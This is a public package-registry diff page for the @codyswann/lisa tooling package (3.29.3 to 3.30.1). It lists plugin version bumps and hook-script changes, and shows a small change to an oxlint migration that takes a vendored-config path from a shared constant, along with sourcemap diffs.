@codyswann/lisa 3.29.3 → 3.30.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (75) hide show
  1. package/all/copy-overwrite/scripts/lisa-hooks/block-direct-issue-create.sh +66 -5
  2. package/all/copy-overwrite/scripts/lisa-hooks/block-managed-file-edits.sh +48 -1
  3. package/dist/core/lisa-owned-hash-ledger.d.ts.map +1 -1
  4. package/dist/core/lisa-owned-hash-ledger.js +3 -0
  5. package/dist/core/lisa-owned-hash-ledger.js.map +1 -1
  6. package/dist/core/upstream-evidence-manifest.d.ts.map +1 -1
  7. package/dist/core/upstream-evidence-manifest.js +5 -4
  8. package/dist/core/upstream-evidence-manifest.js.map +1 -1
  9. package/dist/migrations/ensure-oxlint-base-configs.d.ts.map +1 -1
  10. package/dist/migrations/ensure-oxlint-base-configs.js +4 -1
  11. package/dist/migrations/ensure-oxlint-base-configs.js.map +1 -1
  12. package/dist/migrations/generated-paths.d.ts +33 -0
  13. package/dist/migrations/generated-paths.d.ts.map +1 -0
  14. package/dist/migrations/generated-paths.js +36 -0
  15. package/dist/migrations/generated-paths.js.map +1 -0
  16. package/package.json +1 -1
  17. package/plugins/lisa/.claude-plugin/plugin.json +1 -1
  18. package/plugins/lisa/.codex-plugin/plugin.json +1 -1
  19. package/plugins/lisa/hooks/block-direct-issue-create.sh +66 -5
  20. package/plugins/lisa/hooks/block-managed-file-edits.sh +48 -1
  21. package/plugins/lisa-agy/hooks/block-direct-issue-create.sh +66 -5
  22. package/plugins/lisa-agy/plugin.json +1 -1
  23. package/plugins/lisa-cdk/.claude-plugin/plugin.json +1 -1
  24. package/plugins/lisa-cdk/.codex-plugin/plugin.json +1 -1
  25. package/plugins/lisa-cdk-agy/plugin.json +1 -1
  26. package/plugins/lisa-cdk-copilot/.claude-plugin/plugin.json +1 -1
  27. package/plugins/lisa-cdk-cursor/.claude-plugin/plugin.json +1 -1
  28. package/plugins/lisa-copilot/.claude-plugin/plugin.json +1 -1
  29. package/plugins/lisa-copilot/hooks/block-direct-issue-create.sh +66 -5
  30. package/plugins/lisa-copilot/hooks/block-managed-file-edits.sh +48 -1
  31. package/plugins/lisa-cursor/.claude-plugin/plugin.json +1 -1
  32. package/plugins/lisa-cursor/hooks/block-direct-issue-create.sh +66 -5
  33. package/plugins/lisa-cursor/hooks/block-managed-file-edits.sh +48 -1
  34. package/plugins/lisa-expo/.claude-plugin/plugin.json +1 -1
  35. package/plugins/lisa-expo/.codex-plugin/plugin.json +1 -1
  36. package/plugins/lisa-expo-agy/plugin.json +1 -1
  37. package/plugins/lisa-expo-copilot/.claude-plugin/plugin.json +1 -1
  38. package/plugins/lisa-expo-cursor/.claude-plugin/plugin.json +1 -1
  39. package/plugins/lisa-harper-fabric/.claude-plugin/plugin.json +1 -1
  40. package/plugins/lisa-harper-fabric/.codex-plugin/plugin.json +1 -1
  41. package/plugins/lisa-harper-fabric-agy/plugin.json +1 -1
  42. package/plugins/lisa-harper-fabric-copilot/.claude-plugin/plugin.json +1 -1
  43. package/plugins/lisa-harper-fabric-cursor/.claude-plugin/plugin.json +1 -1
  44. package/plugins/lisa-nestjs/.claude-plugin/plugin.json +1 -1
  45. package/plugins/lisa-nestjs/.codex-plugin/plugin.json +1 -1
  46. package/plugins/lisa-nestjs-agy/plugin.json +1 -1
  47. package/plugins/lisa-nestjs-copilot/.claude-plugin/plugin.json +1 -1
  48. package/plugins/lisa-nestjs-cursor/.claude-plugin/plugin.json +1 -1
  49. package/plugins/lisa-openclaw/.claude-plugin/plugin.json +1 -1
  50. package/plugins/lisa-openclaw/.codex-plugin/plugin.json +1 -1
  51. package/plugins/lisa-openclaw-agy/plugin.json +1 -1
  52. package/plugins/lisa-openclaw-copilot/.claude-plugin/plugin.json +1 -1
  53. package/plugins/lisa-openclaw-cursor/.claude-plugin/plugin.json +1 -1
  54. package/plugins/lisa-phaser/.claude-plugin/plugin.json +1 -1
  55. package/plugins/lisa-phaser/.codex-plugin/plugin.json +1 -1
  56. package/plugins/lisa-phaser-agy/plugin.json +1 -1
  57. package/plugins/lisa-phaser-copilot/.claude-plugin/plugin.json +1 -1
  58. package/plugins/lisa-phaser-cursor/.claude-plugin/plugin.json +1 -1
  59. package/plugins/lisa-rails/.claude-plugin/plugin.json +1 -1
  60. package/plugins/lisa-rails/.codex-plugin/plugin.json +1 -1
  61. package/plugins/lisa-rails-agy/plugin.json +1 -1
  62. package/plugins/lisa-rails-copilot/.claude-plugin/plugin.json +1 -1
  63. package/plugins/lisa-rails-cursor/.claude-plugin/plugin.json +1 -1
  64. package/plugins/lisa-typescript/.claude-plugin/plugin.json +1 -1
  65. package/plugins/lisa-typescript/.codex-plugin/plugin.json +1 -1
  66. package/plugins/lisa-typescript-agy/plugin.json +1 -1
  67. package/plugins/lisa-typescript-copilot/.claude-plugin/plugin.json +1 -1
  68. package/plugins/lisa-typescript-cursor/.claude-plugin/plugin.json +1 -1
  69. package/plugins/lisa-wiki/.claude-plugin/plugin.json +1 -1
  70. package/plugins/lisa-wiki/.codex-plugin/plugin.json +1 -1
  71. package/plugins/lisa-wiki-agy/plugin.json +1 -1
  72. package/plugins/lisa-wiki-copilot/.claude-plugin/plugin.json +1 -1
  73. package/plugins/lisa-wiki-cursor/.claude-plugin/plugin.json +1 -1
  74. package/plugins/src/base/hooks/block-direct-issue-create.sh +66 -5
  75. package/plugins/src/base/hooks/block-managed-file-edits.sh +48 -1
@@ -1 +1 @@
1
- {"version":3,"file":"ensure-oxlint-base-configs.d.ts","sourceRoot":"","sources":["../../src/migrations/ensure-oxlint-base-configs.ts"],"names":[],"mappings":"AAIA,OAAO,KAAK,EACV,SAAS,EACT,gBAAgB,EAChB,eAAe,EAChB,MAAM,0BAA0B,CAAC;AA4MlC;;;;;;;;;;;;;;;;;;;;;;GAsBG;AACH,qBAAa,gCAAiC,YAAW,SAAS;IAChE,QAAQ,CAAC,IAAI,gCAAgC;IAC7C,QAAQ,CAAC,WAAW,8FACyE;IAE7F;;;;;OAKG;IACG,OAAO,CAAC,GAAG,EAAE,gBAAgB,GAAG,OAAO,CAAC,OAAO,CAAC;IAKtD;;;;OAIG;IACG,KAAK,CAAC,GAAG,EAAE,gBAAgB,GAAG,OAAO,CAAC,eAAe,CAAC;CAuC7D"}
1
+ {"version":3,"file":"ensure-oxlint-base-configs.d.ts","sourceRoot":"","sources":["../../src/migrations/ensure-oxlint-base-configs.ts"],"names":[],"mappings":"AAKA,OAAO,KAAK,EACV,SAAS,EACT,gBAAgB,EAChB,eAAe,EAChB,MAAM,0BAA0B,CAAC;AA8MlC;;;;;;;;;;;;;;;;;;;;;;GAsBG;AACH,qBAAa,gCAAiC,YAAW,SAAS;IAChE,QAAQ,CAAC,IAAI,gCAAgC;IAC7C,QAAQ,CAAC,WAAW,8FACyE;IAE7F;;;;;OAKG;IACG,OAAO,CAAC,GAAG,EAAE,gBAAgB,GAAG,OAAO,CAAC,OAAO,CAAC;IAKtD;;;;OAIG;IACG,KAAK,CAAC,GAAG,EAAE,gBAAgB,GAAG,OAAO,CAAC,eAAe,CAAC;CAuC7D"}
@@ -2,6 +2,7 @@ import { readFile, writeFile } from "node:fs/promises";
2
2
  import * as path from "node:path";
3
3
  import * as fse from "fs-extra";
4
4
  import { readJsonOrNull } from "../utils/json-utils.js";
5
+ import { GENERATED_PATH_PREFIXES } from "./generated-paths.js";
5
6
  const OXLINTRC = ".oxlintrc.json";
6
7
  /**
7
8
  * Repo-relative home for the Lisa oxlint configs vendored into a host project.
@@ -11,7 +12,9 @@ const OXLINTRC = ".oxlintrc.json";
11
12
  * without asking. Hosts never hand-edit these — they layer their own rules in
12
13
  * `.oxlintrc.json`, which stays host-owned.
13
14
  */
14
- const VENDOR_DIR = ".lisa/lisa-oxlint";
15
+ // Single source of truth, shared with the managed-file hook so a guard and a
16
+ // migration can never disagree about what apply regenerates.
17
+ const VENDOR_DIR = GENERATED_PATH_PREFIXES[0];
15
18
  /** `extends` prefix that points at a vendored config. */
16
19
  const VENDOR_PREFIX = `./${VENDOR_DIR}/`;
17
20
  /** Directory inside the Lisa package holding the canonical oxlint configs. */
@@ -1 +1 @@
1
- {"version":3,"file":"ensure-oxlint-base-configs.js","sourceRoot":"","sources":["../../src/migrations/ensure-oxlint-base-configs.ts"],"names":[],"mappings":"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"}
1
+ {"version":3,"file":"ensure-oxlint-base-configs.js","sourceRoot":"","sources":["../../src/migrations/ensure-oxlint-base-configs.ts"],"names":[],"mappings":"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